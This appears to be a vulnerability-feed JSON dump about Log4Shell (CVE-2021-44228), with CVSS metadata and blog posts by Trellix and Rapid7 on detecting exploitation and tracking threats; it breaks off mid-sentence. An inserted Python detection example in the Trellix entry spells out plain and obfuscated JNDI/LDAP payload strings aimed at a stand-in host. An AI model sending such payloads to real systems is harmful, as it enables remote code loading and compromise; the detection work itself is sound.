"privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-22T16:31:18", "type": "threatpost", "title": "Russia Lays Groundwork for Cyberattacks on U.S. 
Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-22T16:31:18", "id": "THREATPOST:40A6B1288BA6177BA30307804BE630D0", "href": "https://threatpost.com/russia-cyberattacks-us-infrastructure/179037/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trellix": [{"lastseen": "2022-01-19T00:00:00", "description": "# Log4J and The Memory That Knew Too Much\n\nBy Trellix \u00b7 January 19, 2022\n\n_By Guilherme Venere, Ismael Valenzuela, Carlos Diaz, Cesar Vargas, Leandro Costantino, Juan Olle, Jose Luis Sanchez Martinez, AC3 Team_\n\n_Collaborators: Steve Povolny, Douglas McKee, Mark Bereza, Frederick House, Dileep Kumar Jallepalli_\n\nThere is never a dull moment in the cybersecurity industry and there is no better time than now to embrace this notion as an advantage and catalyst for business empowerment. \n\nCurrently, professionals across the globe continue to combat the latest threat facing businesses where no vertical is immune. We\u2019ve seen an increase in the analysis and patching of the Log4Shell vulnerability in the Apache Log4j Java-based logging platform for a good reason - Log4j is one of, if not the most popular logging applications used by developers. But businesses also need to think beyond patching, as we are seeing Log4Shell shift what we think of as an attack surface. 
\n\nThe potential for large-scale damage and this vulnerability to proliferate is high, so this impact must be taken seriously now to better plan and safeguard against the next major flaw.\n\nWhile patching is critical, it shouldn\u2019t be a static or one-time fix to ensure infrastructure security. Instead, an always-on approach combining extensive monitoring, assessment, scanning, and forensics must be implemented to provide the agility needed against today\u2019s more modern threats. \n\nSpecifically, in this post we show how an endpoint solution with performant memory scanning capabilities can effectively detect active exploitation scenarios and complement your company\u2019s network security capabilities to create a new kind of resiliency for your organization. \n\n##### Background\n\nAs those across the security industry are aware, yet another new vulnerability affecting a widely used library was released just in time for the 2021 holiday season. CVE-2021-44228 reported a vulnerability in the Log4j Java library affecting applications and web sites using the library to perform logging.\n\nThe vulnerability allowed an attacker to coerce the vulnerable site or application to load and execute a malicious Java code from an untrusted remote location. Attack vectors are varied but the most common is associated with the attacker sending crafted strings as part of a network protocol to the target machine, for example a modified HTTP Header sent as part of a POST request.\n\nThis is the reason many defenders are now focusing their efforts on detecting the malicious strings through network traffic and recognizing that proactivity is critical to drive positive results. However, network signatures can be bypassed and there are reports confirming threat actors are adapting their network attacks with various forms of obfuscation to elude network scanning. 
The image below shows some of the current obfuscation techniques that have been observed or reported related to this attack.\n\n \nSource: <https://github.com/mcb2Eexe/Log4j2-Obfucation> \n \n\n\nNow, this doesn\u2019t mean that network protection solutions are not useful against this attack! In fact, Log4j is proving just how critical it is for defenders to be as adaptable as attackers and enter a new era of living security \u2013 embracing a more dynamic approach and mindset. Network security platforms provide a first layer of defense and should be used as part of an embedded security architecture (security risk treatment strategy), augmented by additional layers of protection, detection, visibility, and response. \n\nModern endpoint solutions are uniquely positioned to complement network-based capabilities with in-depth, host-based visibility of system processes, such as in-memory scanning and rapid response orchestration. This combination results in a robust defense against threats like Log4Shell and allows businesses to build back confidence via end-to-end security. \n\n##### \u2018I See You\u2019: Memory Scanning #FTW\n\nMemory scanning can provide further value and help network security platforms when a connection arrives to the endpoint after defeating the obfuscation layers. The diagram below shows the execution flow for a common web-based Log4j attack.\n\n \n \n\n\nLet\u2019s outline what happens:\n\n * **Step #1:** An attacker sends a specially-crafted string to the web server hosting the vulnerable application. This string, as we see, can be obfuscated to bypass network-based signatures.\n * **Step #2:** The application proceeds to de-obfuscate this string to load it in memory. 
Once loaded into memory, the application initiates a LDAP connection to request the address of where the malicious class file is located.\n * **Step #3:** The attacker-controlled LDAP server responds with the location of the malicious class file by indicating the HTTP URL address of where it is hosted.\n * **Step #4:** The vulnerable application will proceed to initiate a download of the malicious class file.\n * **Step #5:** The vulnerable application will load and run the malicious class file from Step #4. At this moment, the attacker achieves code execution on the target, leaving traces that may provide visibility on this activity for the defender. This can include spawning additional processes or touching files and registry keys after an exploitation. \n\nImagine if we could outsmart the obfuscation tactics? You absolutely can \u2013 and should \u2013 to get ahead of threats like Log4j. This can be accomplished by triggering a memory scan at some point in this execution flow to detect the presence of the malicious code file. We would have a high probability to find the de-obfuscated string used within the process memory at that time. If the memory is scanned after the malicious class file is downloaded, that content would also be available for scanning in its de-obfuscated form.\n\nSuch possibilities make the memory signature performant and efficient, given the timing of the detection mainly depends on the trigger used to start the memory scan.\n\n##### Endpoint Security Expert Rules meets Memory Scan\n\nOur solution allows organizations to do just that, delivering the ability to trigger a memory scan from an Expert Rule.\n\nExpert Rules are customizable access control rules that end-users employ to detect suspicious activity not commonly seen by other scanners. 
We also provide community Expert Rules mapped to the MITRE ATT&CK Matrix through our public GitHub.\n\nThese capabilities let us target the applications vulnerable to Log4j and identify the moment they are being exploited. Consider the following rule:\n\n[Image: the Expert Rule, with ACTOR processes in its Process section and TARGET payloads in its Target section; not reproduced]\n\nHere we see a section defining ACTORS (inside the Process {\u2026} section) and TARGETS (inside the Target {\u2026} section). ACTORS are any process that may be vulnerable to the Log4j exploit. In this case, we see JAVA.EXE for standalone Java applications and TOMCAT?.EXE for Apache web-based applications. Either of these processes needs to load both JAVA.DLL and JVM.DLL to ensure the Java runtime is active.\n\nThe TARGET section includes any potential payload from the attack. As Expert Rules are not focused on network traffic, we need to focus on the last step of the execution flow, which is when the payload is executed. Additional triggers like files or registry keys accessed can be added as more information about exploits becomes available. We can also include any exclusion of valid behavior, as shown in the example above using \u201cExclude\u201d as the command line parameter. This exclusion is something customers can tailor to their environment to avoid false positives, creating better efficiencies when combating threats. \n\nThis Expert Rule will trigger when any ACTOR process spawns any of the TARGET payloads. It is important to note how certain nuances can affect outcomes and false positives. Take a look at this line at the beginning of the rule:\n\n[Image: the rule\u2019s memory-scan reaction line; not reproduced]\n\nThis instruction initiates a memory scan against the ACTOR process which caused the Expert Rule to trigger. Now we have a reliable trigger for a performant memory scan, avoiding any performance issues that could arise from a blind memory scan. 
A bonus is that this scan is done at a time very close to the initial exploitation attempt, which makes it very likely that the de-obfuscated string is still in memory.\n\nNext, we scan the memory of the process which triggered the Expert Rule, executed by the AV DAT Engine. Once this string is found, detection will occur on the affected process, and the action configured in the Expert Rule REACTION line will be applied. We recommend you use the REPORT action initially until you have sorted out what processes you need to monitor.\n\n[Image: event log showing the Expert Rule event followed by the AV DAT detection; not reproduced]\n\nThe first event highlighted above is the Expert Rule triggering for a suspicious process spawning from JAVA.EXE, and the second shows the AV DAT detection indicating the memory of that process had signatures of the exploit.\n\n##### Note:\n\nIf the Expert Rule detection was solely present and NOT the Java Naming and Directory Interface (JNDI)/Log4j-Exploit event, it would indicate a program has executed suspicious child processes, and customers are advised to review the event and improve the Expert Rule accordingly.\n\nHowever, if both the Expert Rule and JNDI/Log4j-Exploit events are triggered for the same program, we have confidently detected the presence of the process being exploited.\n\nWe provide more information about our current coverage for the Log4j vulnerability in KB95901 \u2013 coverage for Apache Log4j CVE-2021-44228 Remote Code Execution. This article contains links to download the Expert Rule and an updated EXTRA.DAT, as well as details on how to set up ePO to use them in your environment.\n\nIf you\u2019d like to implement this solution, we encourage you to review the instructions in the KB and associated documentation. It is highly recommended to review the Expert Rule and customize it to your environment so you\u2019re not only thwarting or responding to active risks, but also dynamically adapting to safeguard against evolving threats. 
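The de-obfuscation step (Step #2 above) and the Expert Rule plus memory-scan pairing, as an added example that is not Trellix's code and does not use its Expert Rule syntax: it resolves the lookup forms that the obfuscation list relies on the way Log4j 2 would (lower/upper/date lookups and the `:-` default-value syntax, with the prefix compared case-insensitively as the Interpolator does), shows that a literal `${jndi:` signature misses the obfuscated forms while a scan of the resolved text catches them, and then applies the triage logic from the Note. The ACTOR and TARGET process names, the payload strings and the "memory" buffer are constructed; the LDAP host is a documentation address, not a real server.

```python
"""Added example, not Trellix's code or Expert Rule syntax: resolve Log4j 2
lookup obfuscation as the vulnerable logger would, then apply the two-stage
logic described above (process-spawn trigger, then a scan of the triggering
process's memory). All names, payloads and buffer contents are constructed."""
import re

# Innermost ${...} lookup: a body with no nested "${" or "}" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve_one(body: str) -> str:
    """Resolve one lookup body (the text between ${ and }) for the prefixes
    obfuscated payloads depend on. Log4j lower-cases the prefix, and the
    ':-' default-value syntax yields its right-hand side for any prefix."""
    if ":-" in body:                      # ${::-j}, ${env:UNSET:-j}, ${sys:x:-j}
        return body.split(":-", 1)[1]
    prefix, _, arg = body.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if prefix == "date" and len(arg) >= 2 and arg[0] == arg[-1] == "'":
        return arg[1:-1]                  # ${date:'j'}: a quoted literal
    return ""                             # env/sys/etc. with no default: not resolvable offline


def deobfuscate(text: str, max_rounds: int = 64) -> str:
    """Repeatedly resolve innermost lookups, leaving ${jndi:...} in place so it
    stays visible to the scanner; max_rounds bounds work on adversarial input."""
    for _ in range(max_rounds):
        out, pos, changed = [], 0, False
        for m in _INNER.finditer(text):
            if m.group(1).lower().startswith("jndi:"):
                continue
            out.append(text[pos:m.start()])
            out.append(_resolve_one(m.group(1)))
            pos, changed = m.end(), True
        if not changed:
            return text
        out.append(text[pos:])
        text = "".join(out)
    return text


def naive_signature(raw: str) -> bool:
    """The literal most network signatures key on; misses every obfuscated form."""
    return "${jndi:" in raw


_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def memory_scan(memory: str) -> bool:
    """What a scan of the de-obfuscated buffer sees."""
    return _JNDI.search(deobfuscate(memory)) is not None


# Hypothetical ACTOR / TARGET sets mirroring the rule described above.
JAVA_ACTORS = {"java.exe", "javaw.exe", "tomcat8.exe", "tomcat9.exe"}
TARGET_PAYLOADS = {"cmd.exe", "powershell.exe", "certutil.exe", "bitsadmin.exe"}


def expert_rule_fires(parent_image: str, child_image: str) -> bool:
    return parent_image.lower() in JAVA_ACTORS and child_image.lower() in TARGET_PAYLOADS


def triage(parent_image: str, child_image: str, parent_memory: str) -> str:
    """'none': rule did not fire; 'expert_rule_only': suspicious child but no
    JNDI lookup in memory (review and tune the rule); 'confirmed': both fired."""
    if not expert_rule_fires(parent_image, child_image):
        return "none"
    return "confirmed" if memory_scan(parent_memory) else "expert_rule_only"


# Constructed payloads; 198.51.100.7 is a documentation address.
PLAIN = "${jndi:ldap://198.51.100.7:1389/a}"
LOWER = "${${lower:j}${lower:n}${lower:d}${lower:i}:${lower:L}dap://198.51.100.7:1389/a}"
DEFAULTS = "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7:1389/a}"
MIXED = "${${env:NOPE:-j}ndi:${date:'l'}dap://198.51.100.7:1389/a}"
BENIGN = "GET /index.html User-Agent: Mozilla/5.0 (${user} logged in)"

if __name__ == "__main__":
    print("sig    mem    resolved")
    for sample in (PLAIN, LOWER, DEFAULTS, MIXED, BENIGN):
        print(f"{naive_signature(sample)!s:6} {memory_scan(sample)!s:6} {deobfuscate(sample)}")
    print(triage("java.exe", "powershell.exe", "...request buffer... " + LOWER))
```

Only the `lower`, `upper`, `date` and default-value forms are resolved here; other lookups (`env`, `sys`, `ctx`) depend on the target host's state and are collapsed to an empty string, which is enough to expose the `${jndi:` prefix in the samples above but means a payload that hides the prefix inside a real environment variable would still need the host-side scan.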
\n\n##### Conclusion\n\nTo protect an environment against attacks like Log4j, a layered, embedded strategy comprised of network security coupled with targeted endpoint memory scans allows defenders to effectively detect and prevent the attack execution flow against vulnerable systems exposed via network vectors. Our ENS Expert Rules and Custom Scan reactions are designed to enable you with such capabilities so you can apply precise countermeasures against these emerging threats and gain the upper hand and more confidence to maintain and grow your business. \n", "cvss3": {}, "published": "2022-01-19T00:00:00", "type": "trellix", "title": "Log4J and The Memory That Knew Too Much", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T00:00:00", "id": "TRELLIX:908157CFA8050AA23921170E873187E1", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/log4j-and-the-memory-that-knew-too-much.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2021-12-14T23:08:05", "description": "\n\nIt's been a long few days as organizations' security teams have worked to map, quantify, and mitigate the immense risk presented by the [Log4Shell vulnerability within Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>). As can be imagined, cybercriminals are working overtime as well, as they seek out ways to exploit this vulnerability.\n\n#### Need clarity on detecting and mitigating Log4Shell?\n\n[Sign up for our webinar on Thursday, December 16, 2021](<https://www.rapid7.com/about/events-webcasts/brighttalk/524370/>)\n\n \n\n\nThe Rapid7 Threat Intelligence team is tracking the attacker's-eye view and the related chatter on the clear, deep, and dark web within our [Threat Intelligence platform](<https://www.rapid7.com/products/threat-command/>). 
Here are 4 observations based on what we've seen at the onset of the identification of CVE-2021-44228.\n\n## 1\\. We see a spike in hacker chatter and security researchers' publications about Log4j.\n\n\n\nIncreased hacker chatter is a key indicator of an emerging threat that security teams must account for. Clearly the spike here is no surprise \u2013 however, it is important to monitor and understand the types and scope of the chatter in order to get a clear picture of what's on the horizon.\n\n## 2\\. Hackers \u2013 specifically from the Russian, Chinese, and Turkish communities \u2013 show interest in the vulnerability and are actively sharing scanners and exploits.\n\n\n\nThe following two screenshots show that bad actors have already developed and shared proof of concepts exploiting the vulnerability in Log4j. They also show the extent to which this vulnerability impacts user communities such as PC gamers, social media users, Apple/iCloud customers, and more.\n\n[Image: Log4Shell discussion on a Russian cybercrime forum]\n\n[Image: Log4j discussion on a Turkish cybercrime forum]\n\n## 3\\. Code with a proof of concept for the exploit has been published on GitHub.\n\n\n\nThe underground cybercrime community functions like any other business model, but what sets it apart is the spirit with which bad actors share their work for mass consumption. The example above is completely open and free for anyone to access and utilize.\n\n## 4\\. Various scanners were published on GitHub to identify vulnerable systems.\n\nScanners are the cybercriminal's tool of choice for finding specific vulnerabilities in networks communicating via the internet. 
Using a scanner, any company \u2014 regardless of size \u2014 can be a target.\n\n[Image: Log4j scanner discussion on Reddit]\n\n[Image: a fully automated, accurate, and extensive scanner for finding vulnerable Log4j hosts]\n\n## While others look inside, we look outside\n\nThe bottom line is that threat actors are showing great interest in Log4j within underground communities, and they are leveraging these communities to share information and experience regarding exploiting this vulnerability. That emphasizes the need to quickly patch this vulnerability, before multiple cybercriminals get their hands on an exploit and start to utilize it on a large scale.\n\n_[Read more](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) about the Log4Shell vulnerability within Log4j, and what your team can do in response._", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T21:05:17", "type": "rapid7blog", "title": "Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T21:05:17", "id": 
"RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "href": "https://blog.rapid7.com/2021/12/14/log4j-makes-its-appearance-in-hacker-chatter-4-observations/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T17:28:27", "description": "\n\nThe world of the cloud never stops moving \u2014 so neither can cloud security. In the face of rapidly evolving technology and a constantly changing threat landscape, keeping up with all the latest developments, trends, and best practices in this emerging practice is more vital than ever.\n\nEnter Rapid7\u2019s [third annual Cloud Security Summit](<https://www.rapid7.com/info/events-2022/rapid7-cloud-security-summit/>), which we\u2019ll be hosting this year on Tuesday, March 29. This one-day virtual event is dedicated to [cloud security best practices](<https://www.rapid7.com/fundamentals/cloud-network-security/>) and will feature industry experts from Rapid7, as well as Amazon Web Services (AWS), Snyk, and more. \n\nWhile the event is fully virtual and free, we know that the time commitment can be the most challenging part of attending a multi-hour event during the workday. 
With that in mind, we\u2019ve compiled a short list of the top reasons you\u2019ll definitely want to register, clear your calendar, and attend this event.\n\n## Reason 1: Get a sneak peek at some original cloud security research\n\nDuring the opening session of this year\u2019s summit, two members of Rapid7\u2019s award-winning security research team will be presenting some never-before-published research on the current state of cloud security operations, the [most common misconfigurations in 2021](<https://www.rapid7.com/info/2021-cloud-misconfigurations-research-report/>), [Log4j](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), and more.\n\nAlong with being genuinely interesting data, this research will also give you some insights and benchmarks that will help you evaluate your own [cloud security program](<https://www.rapid7.com/fundamentals/cloud-security/>), and prioritize the most commonly exploited risks in your organization's environment.\n\n## Reason 2: Learn from industry experts, and get CPE credits\n\nAlong with a handful of team members from Rapid7\u2019s own cloud security practice, this year\u2019s summit includes a host of subject matter experts from across the industry. You can look forward to hearing from Merritt Baer, Principal in the Office of the CISO at Amazon Web Services; Anthony Seto, Field Director for Cloud Native Application Security at Snyk; Keith Hoodlet, Code Security Architect at GitHub; and more. And that doesn\u2019t even include the InsightCloudSec customers who will be joining to share their expert perspectives as well.\n\nWhile learning and knowledge gain are clearly the most important aspects here, it\u2019s always great to have something extra to show for the time you devoted to an event like this. 
To help make the case to your management that this event is more than worth the time you\u2019ll put in, we\u2019ve arranged for all attendees to earn 3.5 continuing professional education (CPE) credits to go toward maintaining or upgrading security certifications, such as [CISSP](<https://www.isc2.org/Certifications/CISSP#>), [CISM](<https://www.isaca.org/credentialing/cism/maintain-cism-certification>), and more. \n\n## Reason 3: Be the first to hear exciting Rapid7 announcements\n\nLast but not least, while the event is primarily focused on cloud security research, strategies, and thought leadership, we are also planning to pepper in some exciting news related to [InsightCloudSec](<https://www.rapid7.com/products/insightcloudsec/>), Rapid7\u2019s cloud-native security platform. \n\nWe\u2019ll end the day with a demonstration of the product, so you can see some of our newest capabilities in action. Whether you're already an InsightCloudSec customer, or considering a new solution for uncovering misconfigurations, automating cloud security workflows, shifting left, and more, this is the best way to get a live look at one of the top solutions available in the market today. \n\nSo what are you waiting for? 
Come join us, and let\u2019s dive into the latest and greatest in cloud security together.\n\n#### Join our 2022 Cloud Security Summit\n\n[Register Now](<https://www.rapid7.com/info/events-2022/rapid7-cloud-security-summit/>)\n\n \n\n\n \n**_Additional reading_**\n\n * _[Cloud Security and Compliance: The Ultimate Frenemies of Financial Services](<https://www.rapid7.com/blog/post/2022/02/17/cloud-security-and-compliance-the-ultimate-frenemies-of-financial-services/>)_\n * _[Stay Ahead of Threats With Cloud Workload Protection](<https://www.rapid7.com/blog/post/2021/12/10/stay-ahead-of-threats-with-cloud-workload-protection/>)_\n * _[InsightCloudSec Supports 12 New AWS Services Announced at re:Invent](<https://www.rapid7.com/blog/post/2021/12/06/insightcloudsec-supports-12-new-aws-services-announced-at-re-invent/>)_\n * _[Kubernetes Guardrails: Bringing DevOps and Security Together on Cloud](<https://www.rapid7.com/blog/post/2021/12/06/kubernetes-guardrails-bringing-devops-and-security-together-on-cloud/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T17:06:13", "type": "rapid7blog", "title": "3 Reasons to Join Rapid7\u2019s Cloud Security Summit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T17:06:13", "id": "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "href": "https://blog.rapid7.com/2022/03/09/3-reasons-to-join-rapid7s-cloud-security-summit/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T23:31:00", "description": "![\\[Security Nation\\] Mike Hanley of GitHub on the Log4j Vulnerability](https://blog.rapid7.com/content/images/2022/01/security_nation_logo.jpg)\n\nIn our first episode of Security Nation Season 5, Jen and Tod chat with Mike Hanley, Chief Security Officer at GitHub, all about the major vulnerability in Apache\u2019s Log4j logging library (aka Log4Shell). Mike talks about the ins and outs of GitHub\u2019s response to this blockbuster vulnerability and what could have helped the industry deal with an issue of this massive scope more effectively (hint: he drops the SBOM). They also touch on GitHub's updated policy on the sharing of exploits.\n\nStick around for our Rapid Rundown, where Tod and Jen talk about Microsoft\u2019s release of emergency fixes for Windows Server and VPN over Martin Luther King Day weekend.\n\n## Mike Hanley\n\n![\\[Security Nation\\] Mike Hanley of GitHub on the Log4j Vulnerability](https://blog.rapid7.com/content/images/2022/01/image1.jpg)\n\nMike Hanley is the Chief Security Officer at GitHub. Prior to GitHub, Mike was the Vice President of Security at Duo Security, where he built and led the security research, development, and operations functions. After Duo\u2019s acquisition by Cisco for $2.35 billion in 2018, Mike led the transformation of Cisco\u2019s cloud security framework and later served as CISO for the company. 
Mike also spent several years at CERT/CC as a Senior Member of the Technical Staff and security researcher focused on applied R&D programs for the US Department of Defense and the Intelligence Community.\n\nWhen he\u2019s not talking about security at GitHub, Mike can be found enjoying Ann Arbor, MI with his wife and seven kids.\n\n## Show notes\n\n**Interview links**\n\n * Read [GitHub\u2019s blog](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/>) on the Log4j vulnerability, and [the follow-up](<https://github.blog/2021-12-14-using-githubs-security-features-identify-log4j-exposure-codebase/>).\n * Check out GitHub\u2019s [Dependabot](<https://github.com/dependabot>).\n * Find out [Why Johnny Can\u2019t Encrypt](<https://www.usenix.org/conference/8th-usenix-security-symposium/why-johnny-cant-encrypt-usability-evaluation-pgp-50>).\n * Learn about [GitHub\u2019s Sponsor Program](<https://github.com/sponsors>).\n * Read about the work going on at [OpenSSF](<https://openssf.org/>).\n * Delve into Mike\u2019s [blog post on GitHub\u2019s exploit code policy](<https://github.blog/2021-06-04-updates-to-our-policies-regarding-exploits-malware-and-vulnerability-research/>).\n\n**Rapid Rundown links**\n\n * Get the info on [Microsoft\u2019s emergency fixes](<https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-emergency-fixes-for-windows-server-vpn-bugs/>) for Windows Server and VPN bugs.\n\nLike the show? Want to keep Jen and Tod in the podcasting business? 
Feel free to rate and review with your favorite podcast purveyor, like [**Apple Podcasts**](<https://podcasts.apple.com/us/podcast/security-nation/id1124543784#see-all/reviews>).\n\n#### Want More Inspiring Stories From the Security Community?\n\n[Subscribe to Security Nation Today](<https://podcasts.apple.com/us/podcast/security-nation/id1124543784>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T21:47:30", "type": "rapid7blog", "title": "[Security Nation] Mike Hanley of GitHub on the Log4j Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T21:47:30", "id": "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "href": "https://blog.rapid7.com/2022/01/19/security-nation-mike-hanley-of-github-on-the-log4j-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-19T19:35:50", "description": "\n\nThe world of cybersecurity never has a dull moment. 
While we are still recovering from the aftermath of [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), the recent [ContiLeaks](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>) exposed multiple vulnerabilities that have been exploited by the Conti ransomware group. It\u2019s critical for your team to identify the risk posed by such vulnerabilities and implement necessary remediation measures. As you will see, the product updates our vulnerability management (VM) team has made to [InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) in the last quarter will empower _you_ to stay in charge \u2014 not the vulnerabilities.\n\nBut that\u2019s not all we\u2019ve improved on. We\u2019ve expanded the scope of vulnerabilities tracked by incorporating [CISA\u2019s known exploited vulnerabilities (KEV)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) in the Threat Feed, and added usability enhancements, targeted reporting and scanning, and Log4Shell mitigation checks. And we\u2019ve released our annual [Vulnerability Intelligence Report](<https://www.rapid7.com/products/insightvm/vulnerability-report-hub-page/>) to help you make sense of the vulns that impacted us last year and understand the trends that we will all be facing this year. Our team also offers practical guidance to help security teams better protect themselves.\n\nLet\u2019s dive into the key feature releases and updates on the vulnerability management front for Q1 2022.\n\n## [InsightVM] ContiLeaks Helpful Query to easily detect ContiLeaks vulns and ensure compliance\n\nCISA\u2019s KEV catalog is part of the agency\u2019s [binding operational directive](<https://www.cisa.gov/binding-operational-directive-22-01>) that has reporting requirements for federal agencies and civilian contractors. 
The recent ContiLeaks revealed over 30 vulns that are now a part of CISA\u2019s KEV. While users could always build a query in IVM to identify these vulns, doing so is time-consuming and can be prone to error. The ContiLeaks Helpful Query takes out the manual effort and lets customers easily locate 30+ ContiLeaks vulnerabilities in their environments. When the query is loaded into our Specific Vulnerability Dashboard template, it can give an at-a-glance view of the company\u2019s risk posture as it relates to the Conti threat. In addition to helping customers identify the exploited vulnerabilities in their environment, the update will also help them stay within the bounds of CISA\u2019s operative directive.\n\n## [InsightVM] Threat feed dashboard now includes CISA\u2019s KEV catalog\n\nWhile we are on the topic of CISA, you will be excited to learn that we have expanded the scope of vulnerabilities tracked to incorporate CISA\u2019s KEV catalog in the InsightVM [Threat Feed Dashboard](<https://www.rapid7.com/blog/post/2017/06/13/live-threat-driven-prioritization/>), including the **Assets With Actively Targeted Vulnerabilities** card and the **Most Common Actively Targeted Vulnerabilities** card. The CISA inclusion makes it easy to see how exposed your organization is to active threats and informs prioritization decisions around remediation efforts.\n\nWe have also added a new \u201cCISA KEV (known exploited vulnerability)\u201d vulnerability category to allow for more targeted scanning (i.e. scanning the environment for CISA KEV entries only). You can also use the CISA KEV category to filter scan reports.\n\n## [Insight VM and Nexpose] A new credential type to support scanning Oracle Databases by Service Name\n\nInsightVM and Nexpose customers have always been able to scan Oracle databases using SIDs (system identifiers) but were previously unable to provide a Service Name in the credential. 
